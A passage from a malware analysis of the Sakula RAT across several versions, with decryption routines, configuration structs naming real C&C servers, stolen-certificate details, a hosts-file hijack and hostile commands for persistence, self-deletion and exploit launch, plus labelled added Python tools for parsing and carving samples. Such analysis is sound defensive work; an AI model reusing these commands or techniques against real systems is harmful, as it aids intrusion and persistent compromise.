    • get each LDR_DATA_TABLE_ENTRY structure from the field LDR.InLoadOrderModuleList (list of loaded modules)
    • look at each LDR_DATA_TABLE_ENTRY.BaseDllName and search for a module with a specific name checksum
    • get the module's LDR_DATA_TABLE_ENTRY.DllBase, which is the base address of the module
    • get the DOS_HEADER.e_lfanew field (baseaddress+0x3C), which contains the PE header offset
    • get the IMAGE_DIRECTORY_ENTRY_EXPORT structure's address (peheader+0x78)
    • get the AddressOfNames field (dd_export+0x20) (list of strings)
    • look at each procedure's name and search for the index of the procedure with a specific name checksum
    • use the AddressOfNameOrdinals field (dd_export+0x24) to get the offset of the procedure from the found index
  • extracts its payload (the original PE file) located at the end of the shellcode
  • loads the PE payload in memory
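As an added example (not code from the original post), the export-directory walk of the loader's GetProcAddress routine, reproduced in Python over a flat in-memory PE image. This is what a reverser rebuilds to map the name checksums a loader carries back to API names. Assumptions: RVAs equal buffer offsets (no section remapping), and an illustrative ROR-13 checksum stands in for Sakula's undocumented name-checksum routine; the PE image is constructed test data.

```python
import struct


def ror13_hash(name):
    # Illustrative ROR-13 checksum over the ASCII export name. Assumption:
    # Sakula's real checksum routine is not given above, so this stands in.
    h = 0
    for b in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + b) & 0xFFFFFFFF
    return h


def u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0]


def u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def resolve_export_by_hash(image, wanted, hash_fn=ror13_hash):
    """Walk the export directory the way the shellcode does.

    `image` is a flat PE32 image in which RVAs equal buffer offsets
    (assumption: no section-to-file remapping). Returns the RVA of the
    first export whose name hashes to `wanted`, or None.
    """
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = u32(image, 0x3C)                        # DOS_HEADER.e_lfanew
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    export_dir = u32(image, pe + 0x78)           # IMAGE_DIRECTORY_ENTRY_EXPORT RVA
    if export_dir == 0:
        return None                              # module exports nothing
    n_names = u32(image, export_dir + 0x18)      # NumberOfNames
    functions = u32(image, export_dir + 0x1C)    # AddressOfFunctions
    names = u32(image, export_dir + 0x20)        # AddressOfNames
    ordinals = u32(image, export_dir + 0x24)     # AddressOfNameOrdinals
    for i in range(n_names):
        name_rva = u32(image, names + 4 * i)
        name = image[name_rva:image.index(b"\0", name_rva)]
        if hash_fn(name) == wanted:
            ordinal = u16(image, ordinals + 2 * i)   # index into AddressOfFunctions
            return u32(image, functions + 4 * ordinal)
    return None


def build_flat_pe(exports):
    """Constructed test data: a minimal PE32 image exporting `exports`
    (a list of (name, rva) pairs), with the export directory at RVA 0x200."""
    img = bytearray(0x400)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)          # e_lfanew
    pe = 0x40
    img[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<HH", img, pe + 4, 0x14C, 0)   # Machine=i386, 0 sections
    struct.pack_into("<H", img, pe + 20, 224)        # SizeOfOptionalHeader (PE32)
    struct.pack_into("<H", img, pe + 24, 0x10B)      # optional header magic (PE32)
    exp, n = 0x200, len(exports)
    funcs, names, ords = exp + 0x28, exp + 0x28 + 4 * n, exp + 0x28 + 8 * n
    cur = ords + 2 * n                               # name strings follow the tables
    struct.pack_into("<II", img, pe + 0x78, exp, 0x28 + 10 * n)  # export data directory
    struct.pack_into("<III", img, exp + 0x14, n, n, funcs)       # NumberOfFunctions/Names, AddressOfFunctions
    struct.pack_into("<II", img, exp + 0x20, names, ords)        # AddressOfNames, AddressOfNameOrdinals
    for i, (name, rva) in enumerate(exports):
        struct.pack_into("<I", img, funcs + 4 * i, rva)
        struct.pack_into("<I", img, names + 4 * i, cur)
        struct.pack_into("<H", img, ords + 2 * i, i)
        img[cur:cur + len(name) + 1] = name + b"\0"
        cur += len(name) + 1
    return bytes(img)


if __name__ == "__main__":
    image = build_flat_pe([(b"CreateFileA", 0x1000), (b"WinExec", 0x1010), (b"WriteFile", 0x1020)])
    print(hex(resolve_export_by_hash(image, ror13_hash(b"WinExec"))))
```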

UPX is then applied to the previous payload, probably to reduce its size and obfuscate it.

Since version 1.4, the Sakula core has undergone some updates.

It is signed with a stolen certificate:

  • Certificate issued to NexG by VeriSign Class 3 Code Signing 2010 CA

sakula_2_0_cert.png

It uses a new algorithm to decrypt its embedded exploits:

def decrypt_plugx(data, key):
    # data: encrypted bytes; key: 32-bit seed. Four registers are stepped
    # once per byte and the low byte of their sum is XORed with the ciphertext.
    v1 = v2 = v3 = v4 = key
    decrypted = bytearray()
    for c in data:
        v1 = (v1 + (v1 >> 3) - 0x1ACDF531) & 0xFFFFFFFF
        v2 = (v2 + (v2 >> 5) - 0x2CAFDCF2) & 0xFFFFFFFF
        v3 = (v3 + 0x34712393 - (v3 << 7)) & 0xFFFFFFFF
        v4 = (v4 + 0x46ADC7A4 - (v4 << 9)) & 0xFFFFFFFF

        xkey = (v1 + v2 + v3 + v4) & 0xFF

        decrypted.append(c ^ xkey)

    return bytes(decrypted)

This algorithm is not custom: it was already seen in a PlugX sample (19d340cdc82d72705d0add94c8a43b0afe7e4f8cabc7c0f9abbb79cc55fc3c0d), dated 07/06/2013, with a different key (0xDF1D89DE). The key used in this version is 0x128933DF.

Before dropping its exploit to bypass UAC, it creates an event named Sakula and exits only if the exploit notifies its success via the event within the next 60 seconds.

When executed, the malware moves 3 files to a new location: itself, ./log.bin and ./OLEPRO32.DLL. At this moment, we do not have the last 2 files, so their purpose cannot be determined.

The method used to delete itself has been updated. It now gets the cmd path through %COMSPEC% and executes it with the command /c del [FILENAME] > nul.

The configuration structure is:

struct ConfigV2_0
{
    CHAR    cc_domain[50];              //  115.47.35.117
    CHAR    uri_get1_folder[50];        //  /photo/
    CHAR    uri_get3_file[50];          //  script.asp
    CHAR    uri_get2_file[50];          //  /script.asp
    CHAR    uri_get3_arg[50];           //  imageid
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    CHAR    copy_file_path[50];         //  %Temp%\MicroMedia
    CHAR    campaign_id[12];            //  [REMOVED]
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
}

An example of used URIs:

  • POST /script.asp?imageid=[HASH_MACHINE_NAME]&type=[CMD_ID]&resid=[CMD_SEQ_NUM]&nmsg=up
  • GET (1) /photo/[HASH_MACHINE_NAME].jpg?resid=[CMD_SEQ_NUM]
  • GET (2) /script.asp?resid=[CMD_SEQ_NUM]&nmsg=del&photoid=[HASH_MACHINE_NAME]

v2.1 (16/07/2013)

All updates made in this version were designed for a single use only, and are not reused in other versions.

The dropper and the custom PE loader have been merged and UPX is not used anymore.

blackvinev2_1_arch.png

The code of the PE loader has been inserted into the dropper code. Consequently, we can suppose that the authors are the same.

There is a minor update to the old dropper code. Before decrypting its payload with the key 0x33, it XORs its data 0x1000000 times with the key 0x32. This action is cryptographically useless (an even number of XORs with the same key cancels out), but is equivalent to a Sleep.

This version is signed with stolen certificates:

  • Certificate issued to MICRO DIGITAL INC. by VeriSign Class 3 Code Signing 2010 CA

sakula_2_1_1_cert.png

Sakula drops an ActiveX file named ./MicroSoftSecurityLogin.ocx (only in this version). It has no interaction with the RAT and is almost empty; its purpose cannot be determined. Sakula extracts it from its resources (type DLL, name 0x45A). It is encrypted, like the embedded exploits, with the PlugX algorithm. Attackers have the possibility to pop up a MessageBox containing the message fail to install activex.\n maybe you should reinstall it, independently of the actual result of the installation. This feature is not used in this version.

Sakula modifies the file \\drivers\\etc\\hosts by adding some hosts (only in this version):

csg.secure.[VICTIM DOMAIN]         217.108.[REMOVED]
ctx.secure.[VICTIM DOMAIN]         217.108.[REMOVED]
fdm.secure.[VICTIM DOMAIN]         217.108.[REMOVED]
qa.fdm.secure.[VICTIM DOMAIN]      217.108.[REMOVED]
qa.indigo.secure.[VICTIM DOMAIN]   217.108.[REMOVED]
pi.secure.[VICTIM DOMAIN]          217.108.[REMOVED]
qa.secure.[VICTIM DOMAIN]          217.108.[REMOVED]
qasd.secure.[VICTIM DOMAIN]        217.108.[REMOVED]
sd.secure.[VICTIM DOMAIN]          217.108.[REMOVED]
int.tcua.secure.[VICTIM DOMAIN]    217.108.[REMOVED]
qa.tcua.secure.[VICTIM DOMAIN]     217.108.[REMOVED]
secure.[VICTIM DOMAIN]             217.108.[REMOVED]

It uses the same configuration structure as v2.0, but with different data:

struct ConfigV2_1
{
    CHAR    cc_domain[50];              //  login.qzbwcq.com
    CHAR    uri_get1_folder[50];        //  /photo/
    CHAR    uri_get3_file[50];          //  script.asp
    CHAR    uri_get2_file[50];          //  /script.asp
    CHAR    uri_get3_arg[50];           //  imageid
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    CHAR    copy_file_path[50];         //  %Temp%\MicroMedia
    CHAR    campaign_id[12];            //  [REMOVED]
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
}

struct ConfigV2_1
{
    CHAR    cc_domain[50];              //  oa.ameteksen.com:80
                                        //  oa.ameteksen.com:443
    CHAR    uri_get1_folder[50];        //  /photo/
    CHAR    uri_get3_file[50];          //  script.asp
    CHAR    uri_get2_file[50];          //  /script.asp
    CHAR    uri_get3_arg[50];           //  imageid
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    CHAR    copy_file_path[50];         //  %Temp%\MicroMedia
    CHAR    campaign_id[12];            //  [REMOVED]
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
}

struct ConfigV2_1
{
    CHAR    cc_domain[50];              //  sinmoung.com
                                        //  secure.devpia.com
                                        //  secure.devpia.com:443
    CHAR    uri_get1_folder[50];        //  /photo/
    CHAR    uri_get3_file[50];          //  script.asp
    CHAR    uri_get2_file[50];          //  /script.asp
    CHAR    uri_get3_arg[50];           //  imageid
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    CHAR    copy_file_path[50];         //  %Temp%\MicroMedia
    CHAR    campaign_id[12];            //  [REMOVED]
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
}

An example of used URIs:

  • POST /script.asp?imageid=[HASH_MACHINE_NAME]&type=[CMD_ID]&resid=[CMD_SEQ_NUM]&nmsg=up
  • GET (1) /photo/[HASH_MACHINE_NAME].jpg?resid=[CMD_SEQ_NUM]
  • GET (2) /script.asp?resid=[CMD_SEQ_NUM]&nmsg=del&photoid=[HASH_MACHINE_NAME]

v2.2 (24/09/2013)

The code of v2.2 comes from v2.0, with the same protection mechanisms except UPX.

blackvinev2_2_arch.png

This version is signed with the same stolen certificates as in version 2.1.

A new encryption algorithm has been implemented in the dropper. Instead of the single-byte XOR encryption, it uses the RC4 algorithm from OpenSSL with the key goldsunfucker.

This algorithm is also implemented in Sakula with the same key to decrypt payloads, instead of the PlugX algorithm used in v2.0. This indicates that the authors of the protection mechanisms are the same as those of the Sakula RAT.

Payloads are now embedded in resources under the type RES, with the names 0x458 and 0x459.

Some dirty updates can be observed in the installation mechanism. The configuration system is still in place, but some hardcoded paths have been inserted and are used instead: the malware copy path and name, the exploit drop location and name, and the autorun key. Depending on the sample, the values differ:

  • %ALLUSERPROFILE%\SensrSvc.exe
  • %ALLUSERPROFILE%\Utmm.ocx
  • SensrSvc

or

  • %APPDATA%\SensrSvc2013.exe
  • %APPDATA%\Utmm.ocx
  • SenseSvc

It uses the same configuration structure as v2.0 and v2.1, but with different data:

struct ConfigV2_2
{
    CHAR    cc_domain[50];              //  oa.ameteksen.com:80
                                        //  login.ameteksen.com:443
    CHAR    uri_get1_folder[50];        //  /photo/
    CHAR    uri_get3_file[50];          //  script.asp
    CHAR    uri_get2_file[50];          //  /script.asp
    CHAR    uri_get3_arg[50];           //  imageid
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    CHAR    copy_file_path[50];         //  %Temp%\MicroMedia
    CHAR    campaign_id[12];            //  [REMOVED]
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
}

struct ConfigV2_2
{
    CHAR    cc_domain[50];              //  115.47.35.117
    CHAR    uri_get1_folder[50];        //  /photo/
    CHAR    uri_get3_file[50];          //  script.asp
    CHAR    uri_get2_file[50];          //  /script.asp
    CHAR    uri_get3_arg[50];           //  imageid
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    CHAR    copy_file_path[50];         //  %Temp%\MicroMedia
    CHAR    campaign_id[12];            //  [REMOVED]
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
}

An example of used URIs:

  • POST /script.asp?imageid=[HASH_MACHINE_NAME]&type=[CMD_ID]&resid=[CMD_SEQ_NUM]&nmsg=up
  • GET (1) /photo/[HASH_MACHINE_NAME].jpg?resid=[CMD_SEQ_NUM]
  • GET (2) /script.asp?resid=[CMD_SEQ_NUM]&nmsg=del&photoid=[HASH_MACHINE_NAME]

Version 3.0 to 3.2

None of the changes made in versions 2.x are implemented in versions 3.x.

v3.0 (07/01/2014 & 27/02/2014)

Two samples have been found with the same code. We named them 3.0a and 3.0b. They were compiled on different dates (07/01/2014 and 27/02/2014), have different configurations and are signed with different certificates.

Sample 3.0a is distributed through a fake installer:

blackvinev3_0a_installer.png

A protection layer has been added to the RAT with The “Go” Tools, a tool used for manipulating ASM and PE.

The layer, which is located at the beginning of the code section:

  • implements some anti-sandboxing tricks:
    • checks, with a Sleep between two GetTickCount calls, that the Sleep function has not been hooked
    • checks if there is a foreground window
    • checks if the mouse cursor moves
  • decrypts some known Sakula strings using the Sakula XOR algorithm (v1) with the key 0x1E
  • decrypts the Sakula code using the Sakula XOR algorithm (v1) with the key 0x7C

It is signed with a stolen certificate, as in versions 2.x:

  • (v3.0a) Certificate issued to DTOPTOOLZ Co.,Ltd. by VeriSign Class 3 Code Signing 2010 CA

sakula_3_0a_1_cert.png

  • (v3.0b) Certificate issued to SJ SYSTEM by Thawte Code Signing CA – G2

sakula_3_0b_1_cert.png

Installation

Some changes have been made to the installation process.

It no longer uses the Windows API to create the autorun key, but runs cmd.exe with the following commands:

  • cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v [AUTORUN_KEY] /t REG_SZ /d [MLWR_PATH] (if admin)
  • cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [AUTORUN_KEY] /t REG_SZ /d [MLWR_PATH] (if not admin)

Sakula can no longer load an external configuration from the file rss.tmp.

Exploits are now embedded in data rather than in resources. They are encrypted with a new version of the single-byte XOR algorithm:

def decrypt_xor_v2(data, key):
    # data: encrypted bytes; key: single-byte XOR key. Each ciphertext byte
    # is rotated left by one bit (8-bit rotate) before being XORed with the key.
    def rol8(val, r_bits):
        r_bits %= 8
        return ((val << r_bits) & 0xFF) | ((val & 0xFF) >> (8 - r_bits))
    return bytes(rol8(c, 1) ^ key for c in data)

The key used in this version is 0x28.

Before copying itself to another location, it modifies its last 4 bytes with the value returned by GetTickCount. This feature was present in version 1.4 (with the last 8 bytes instead of the last 4), but not in 2.0. This supports the idea that version 2.x is a fork.

It resolves some imports dynamically with GetProcAddress at its start:

  • WinExec
  • WriteFile

Commands

Command N°8 (interact through a reverse shell) has been removed.

The maximum waiting time between commands has been raised to 24 hours and 1 second (0x5265C01), which is 2 milliseconds more than the old value.

The uninstall command deletes the autorun keys in HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE (only in HKEY_CURRENT_USER in previous versions).

Communication

A new User Agent is used: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1).

Data are encrypted using the single-byte XOR algorithm v1 with the key 0x66.

From versions 1.0 to 2.2, Sakula used 3 URIs to communicate:

  • a GET request used to ask for a command from the C&C
  • a GET request used to acknowledge the received command
  • a POST request used to send back a command output

From version 3.0, the GET request used to acknowledge a command has been removed. Instead, it uses the POST request with a command ID equal to 0xFF.

It uses a new configuration structure:

struct ConfigV3_0a
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]
    CHAR    copy_file_path[100];        //  %Temp%
    CHAR    copy_file_folder[100];      //  \MicroMedia
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    DWORD   port;                       //  0x1BB (443)
    CHAR    uri_post[200];              //  /view.asp?cookie=%s&type=%d&vid=%d
    CHAR    url_post[200];              //  http://www.we11point.com:443/view.asp?cookie=%s&type=%d&vid=%d
    CHAR    url_get[100];               //  http://www.we11point.com:443/photo/%s.jpg?vid=%d
    CHAR    cc_domain[100];             //  www.we11point.com
}

struct ConfigV3_0b
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x3A98 (15000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]
    CHAR    copy_file_path[100];        //  %ALLUSERSPROFILE%
    CHAR    copy_file_folder[100];      //  \CitrixReciever
    CHAR    copy_file_name[50];         //  CitrixReciever.exe
    CHAR    autorun_key[50];            //  CitrixXenAppReciever
    DWORD   port;                       //  0x50 (80)
    CHAR    uri_post[200];              //  /news/view.asp?cookie=%s&type=%d&vid=%d
    CHAR    url_post[200];              //  http://www.huchin.com/news/view.asp?cookie=%s&type=%d&vid=%d
    CHAR    url_get[100];               //  http://www.huchin.com/news/photo/%s.jpg?vid=%d
    CHAR    cc_domain[100];             //  www.huchin.com
}
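An added example (not code from the original post) that packs and parses the configuration layouts described in this article, covering both the ConfigV2_x structs of the 2.x branch and the ConfigV3_x struct above; the field order and sizes are transcribed from the structs, while the sample values are constructed placeholders (c2.example.test) rather than data from a real sample.

```python
import struct

# Field layouts transcribed from the ConfigV2_x and ConfigV3_x structs
# (little-endian; every DWORD already sits on a 4-byte boundary, so no padding).
CONFIG_LAYOUTS = {
    "v2": [("cc_domain", "50s"), ("uri_get1_folder", "50s"),
           ("uri_get3_file", "50s"), ("uri_get2_file", "50s"),
           ("uri_get3_arg", "50s"), ("copy_file_name", "50s"),
           ("autorun_key", "50s"), ("copy_file_path", "50s"),
           ("campaign_id", "12s"), ("waiting_time", "I")],
    "v3": [("nb_config", "I"), ("waiting_time", "I"), ("unk", "I"),
           ("campaign_id", "12s"), ("copy_file_path", "100s"),
           ("copy_file_folder", "100s"), ("copy_file_name", "50s"),
           ("autorun_key", "50s"), ("port", "I"), ("uri_post", "200s"),
           ("url_post", "200s"), ("url_get", "100s"), ("cc_domain", "100s")],
}

# Constructed sample (placeholder C&C, not a real sample's data).
SAMPLE_CONFIG_V3 = {
    "nb_config": 1, "waiting_time": 0x3A98, "unk": 0, "campaign_id": "test-camp",
    "copy_file_path": "%Temp%", "copy_file_folder": "\\MicroMedia",
    "copy_file_name": "MediaCenter.exe", "autorun_key": "MicroMedia", "port": 80,
    "uri_post": "/view.asp?cstring=%s&tom=%d&id=%d",
    "url_post": "http://c2.example.test/view.asp?cstring=%s&tom=%d&id=%d",
    "url_get": "http://c2.example.test/photo/%s.jpg?id=%d",
    "cc_domain": "c2.example.test",
}


def _fmt(version):
    return "<" + "".join(f for _, f in CONFIG_LAYOUTS[version])


def config_size(version):
    # 416 bytes for the v2 layout, 928 bytes for the v3 layout.
    return struct.calcsize(_fmt(version))


def parse_config(blob, version):
    """Decode one config struct from the start of `blob` into a dict.

    CHAR arrays are NUL-terminated (anything after the first NUL is
    ignored); DWORD fields come back as ints. Raises ValueError when the
    blob is too short to hold a full struct, rather than returning a
    partially filled config.
    """
    layout = CONFIG_LAYOUTS[version]
    size = config_size(version)
    if len(blob) < size:
        raise ValueError("need %d bytes for a %s config, got %d" % (size, version, len(blob)))
    values = struct.unpack(_fmt(version), blob[:size])
    cfg = {}
    for (name, fmt), value in zip(layout, values):
        if fmt.endswith("s"):
            value = value.split(b"\0", 1)[0].decode("latin-1")
        cfg[name] = value
    return cfg


def pack_config(cfg, version):
    """Inverse of parse_config; used here to build constructed test input.
    Refuses strings that would not leave room for the terminating NUL."""
    layout = CONFIG_LAYOUTS[version]
    values = []
    for name, fmt in layout:
        value = cfg[name]
        if fmt.endswith("s"):
            value = value.encode("latin-1")
            if len(value) >= struct.calcsize(fmt):
                raise ValueError("%s does not fit in %s" % (name, fmt))
        values.append(value)
    return struct.pack(_fmt(version), *values)


if __name__ == "__main__":
    blob = pack_config(SAMPLE_CONFIG_V3, "v3")
    for name, value in parse_config(blob, "v3").items():
        print("%-18s %r" % (name, value))
```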

An example of used URIs for v3.0a:

  • POST /view.asp?cookie=[HASH_MACHINE_NAME]&type=[CMD_ID]&vid=[CMD_SEQ_NUM]
  • GET /photo/[HASH_MACHINE_NAME].jpg?vid=[CMD_SEQ_NUM]

An example of used URIs for v3.0b:

  • POST /news/view.asp?cookie=[HASH_MACHINE_NAME]&type=[CMD_ID]&vid=[CMD_SEQ_NUM]
  • GET /news/photo/[HASH_MACHINE_NAME].jpg?vid=[CMD_SEQ_NUM]

v3.1 (16/05/2014 & 09/07/2014 & 10/07/2014 & 18/09/2014)

Many samples have been found with the same code. We can group them by compilation timestamp (16/05/2014, 09/07/2014, 10/07/2014 and 18/09/2014). We named them respectively 3.1a, 3.1b, 3.1c and 3.1d. They are distributed through different installers signed with stolen certificates and have different configurations.

Sample 3.1a is distributed through a fake installer (compiled on 23/05/2014):

blackvinev3_1a_installer.png

We do not have the installer corresponding to sample 3.1b.

Sample 3.1c is distributed through 2 signed fake installers (compiled on 06/08/2014 and 19/08/2014):

blackvinev3_1c_installer.png blackvinev3_1c2_installer.png

Sample 3.1d is distributed through a signed fake installer (compiled on 27/10/2014):

  • Certificate issued to Career Credit Co,.Ltd. by VeriSign Class 3 Code Signing 2010 CA

sakula_3_1d_1_cert.png

blackvinev3_1d_installer.png

In versions 3.1 and 3.2, Sakula is distributed through a dropper and is no longer signed with a stolen certificate. The dropper contains a legitimate binary (vulnerable to DLL hijacking), a rogue DLL and Sakula embedded in a PE loader. The legitimate binary loads the rogue DLL, which loads and executes the PE loader, which loads and executes the RAT.

blackvinev3_1_arch.png

The dropper:

  • does not execute while the mouse does not move (anti-sandbox trick)
  • extracts the payload located after the tag EEEEEEEE, decrypts it, and writes it to the file %TEMP%\s.exe
  • extracts the payload located after the tag LLLLLLLL, decrypts it, and writes it to the file %TEMP%\msi.dll
  • extracts the payload located after the tag TTTTTTTT and writes it to the file %TEMP%\setup.msi
  • executes %TEMP%\s.exe
  • uninstalls itself with the command ping 127.0.0.1 & del /q [PATH]

The dropper uses the same single-byte XOR algorithm as the RAT (with the key 0x68) and the same deletion method. These facts support the assumption that it is custom-made.
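As an added example (not code from the original post or from the malware), a carver that splits a dropper image at the tags listed above and undoes the XOR layer, so the three dropped files can be recovered statically; it covers the 3.1 layout (EEEEEEEE/LLLLLLLL/TTTTTTTT, key 0x68) and the 3.2 layout (NNNNNNNN/AAAAAAAA/BBBBBBBB, key 0x18) described later. Assumptions: the XOR is the plain v1 byte XOR (the post does not say which variant), each payload runs from its tag to the next tag or end of file, and the dropper image used here is constructed test data.

```python
# Dropper layouts transcribed from the v3.1 and v3.2 descriptions:
# tag -> (file written to %TEMP%, XOR key, or None when the payload is stored as-is).
DROPPER_LAYOUTS = {
    "v3.1": {b"EEEEEEEE": ("s.exe", 0x68),
             b"LLLLLLLL": ("msi.dll", 0x68),
             b"TTTTTTTT": ("setup.msi", None)},
    "v3.2": {b"NNNNNNNN": ("Emabout.dll", 0x18),
             b"AAAAAAAA": ("shutil.dll", 0x18),
             b"BBBBBBBB": ("Thumbs.db", None)},
}


def xor_v1(data, key):
    # Sakula's single-byte XOR (v1): every byte XORed with the same key.
    # Assumption: the dropper uses this plain variant, not the rol-then-xor v2.
    return bytes(b ^ key for b in data)


def looks_like_pe(data):
    # MZ header plus a PE signature at DOS_HEADER.e_lfanew (offset 0x3C).
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def carve_dropper(blob, version):
    """Split a dropper into its payloads and remove the XOR layer.

    Assumption: each payload runs from its 8-byte tag up to the next tag
    (or end of file); the post gives no explicit length field.
    Returns {file name: decoded bytes}; raises ValueError on a missing tag
    so a wrong-version or truncated image is not silently misparsed.
    """
    layout = DROPPER_LAYOUTS[version]
    found = []
    for tag in layout:
        pos = blob.find(tag)
        if pos < 0:
            raise ValueError("tag %r not present: not a %s dropper?" % (tag, version))
        found.append((pos, tag))
    found.sort()
    out = {}
    for i, (pos, tag) in enumerate(found):
        end = found[i + 1][0] if i + 1 < len(found) else len(blob)
        raw = blob[pos + len(tag):end]
        name, key = layout[tag]
        out[name] = xor_v1(raw, key) if key is not None else raw
    return out


def make_fake_pe(marker):
    # Constructed stand-in for a PE file: valid MZ/PE headers, then a marker.
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(hdr) + b"PE\0\0" + marker


def build_sample_dropper(version="v3.1"):
    # Constructed dropper image for a round trip; not a real sample.
    layout = DROPPER_LAYOUTS[version]
    blob = b"\x90" * 16                      # stand-in for the dropper's own code
    for tag, (name, key) in layout.items():
        if key is not None:
            blob += tag + xor_v1(make_fake_pe(name.encode()), key)
        else:
            blob += tag + b"loader+" + name.encode()
    return blob


if __name__ == "__main__":
    for name, data in carve_dropper(build_sample_dropper("v3.1"), "v3.1").items():
        print("%-10s %5d bytes  PE=%s" % (name, len(data), looks_like_pe(data)))
```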

The legitimate binary %TEMP%\s.exe is a digitally signed executable from Kaspersky Lab, originally called setup.exe.

sakula_legitkasperkyexe_3_1_cert.png

The file %TEMP%\msi.dll is a simple DLL which decrypts and executes setup.msi (hardcoded). It uses the single-byte XOR algorithm with the key 0x88.

The file %TEMP%\setup.msi is Sakula embedded in a PE loader. This PE loader is different from the one used in version 2.x, but acts in the same way: it extracts the payload located after the shellcode and loads it in memory.

Installation

Some changes have been made to the installation process:

  • it injects itself into a new process created from %WINDIR%\system32\svchost.exe (3.1a -> 3.1c) or from %WINDIR%\explorer.exe (3.1d)
  • it executes its exploit with the command cmd.exe /c rundll32 [EXPLOIT_PATH] ActiveQvaw [MLWR_PATH]
  • it no longer changes the last 4 bytes of its copy

To move itself to its new location, it moves the dropped files to %Temp%\MicroSoftMedia (depending on configuration):

  • s.exe -> %Temp%\MicroSoftMedia\MediaSoft.exe
  • msi.dll -> %Temp%\MicroSoftMedia\msi.dll
  • setup.msi -> %Temp%\MicroSoftMedia\setup.msi

Communication

A new User Agent is used: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

It uses the same configuration structure as v3.0x, but with different data:

struct ConfigV3_1a
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]
    CHAR    copy_file_path[100];        //  %Temp%
    CHAR    copy_file_folder[100];      //  \MicroMedia
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    DWORD   port;                       //  0x50 (80)
    CHAR    uri_post[200];              //  /view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_post[200];              //  http://192.199.254.126/view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_get[100];               //  http://192.199.254.126/photo/%s.jpg?id=%d
    CHAR    cc_domain[100];             //  192.199.254.126
}

struct ConfigV3_1b
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x3A98 (15000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]
    CHAR    copy_file_path[100];        //  %Temp%
    CHAR    copy_file_folder[100];      //  \MicroSoftMedia
    CHAR    copy_file_name[50];         //  MediaSoft.exe
    CHAR    autorun_key[50];            //  MicroSoftMedia
    DWORD   port;                       //  0x50 (80)
    CHAR    uri_post[200];              //  /view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_post[200];              //  http://180.210.206.246/view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_get[100];               //  http://180.210.206.246/photo/%s.jpg?id=%d
    CHAR    cc_domain[100];             //  180.210.206.246
}

struct ConfigV3_1c
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x3A98 (15000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]
    CHAR    copy_file_path[100];        //  %Temp%
    CHAR    copy_file_folder[100];      //  \JuniperACX
    CHAR    copy_file_name[50];         //  JuniperSafeACX.exe
    CHAR    autorun_key[50];            //  JuniperSafeACX
    DWORD   port;                       //  0x50 (80)
    CHAR    uri_post[200];              //  /view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_post[200];              //  http://23.27.112.143/view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_get[100];               //  http://23.27.112.143/photo/%s.jpg?id=%d
    CHAR    cc_domain[100];             //  23.27.112.143
}

struct ConfigV3_1c
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x3A98 (15000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]
    CHAR    copy_file_path[100];        //  %Temp%
    CHAR    copy_file_folder[100];      //  \MicroMedia
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    DWORD   port;                       //  0x50 (80)
